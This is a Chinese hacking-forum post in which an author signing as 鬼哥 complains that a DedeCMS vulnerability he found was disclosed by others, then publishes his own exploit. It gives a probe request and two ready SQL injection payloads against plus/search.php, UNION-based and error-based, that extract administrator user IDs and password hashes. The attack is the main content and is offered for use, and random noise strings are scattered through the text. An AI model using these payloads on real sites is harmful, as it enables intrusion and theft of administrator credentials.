转载不加作者名的没JJ$ s5 k" u: ?; N6 D3 a
! l9 a( l8 b/ @% A1 z哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
! R' H+ e; s) E: m; Y
6 x3 h8 E5 i! Y2 k; t3 D既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
4 k: f, U3 \) @
# ^9 ~0 P) M7 [; n, S我一般是这样测试的:
' Q) F7 v& a) [9 A& u4 o. M @" c8 }0 M" s# ]/ V. O
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
0 ]( x. w) ?" p& }2 a) N0 x
' V9 C, @' k1 v: X转载不加作者名的没JJ5 f0 D9 d1 @5 x a
?- f4 Q" B0 c, K' m! e: |' T7 p作者:鬼哥% o, }( h7 c) ~, _9 U% j7 ]
7 _3 X5 S- K8 F q+ Y8 G0 p9 M1 j5 y
- u y. n2 s* X. g2 }0 z
! M) _4 {* N% A \
看结果如果提示
8 ~; V2 {0 Y& X+ A5 G, K! W' w/ Q. p5 N
Safe Alert: Request Error step 2 !, l. n+ _% Q, ~6 ]$ e, h) R
, E9 V8 f0 I) g8 Z2 Y
那么直接用下面的exp
# x9 S( _# D+ L' m5 L
9 N: r7 A1 i: E6 P2 |/ ]3 Y( b& Wxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a, i0 B* S9 l# w i5 w
+ `5 [" {& m, a8 N6 k7 f; [
" b1 W* e- I2 n& h
看结果如果提示, k' o4 e7 H8 k# m! E( x# o
& w% {6 y0 ?* [2 QSafe Alert: Request Error step 1 !# A/ E; p8 a) _+ P
' \% d8 ^5 R; R那么直接用下面的exp
/ `& n9 q5 N0 |+ G- v
# _+ S1 i6 D+ kxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a7 \$ Z+ {4 Z& Q" ^' [3 j( \
, M7 z& T6 j8 b. C0 t! [2 |8 Q0 T7 \) B% |9 [" p) H7 v, b# ]5 N( k
如果正常显示证明漏洞不存在了。
* g. j- {# O9 A5 e8 K7 S; x/ B# l8 d3 v/ a6 e; n& y( q8 p ]
转载不加作者名的没JJ |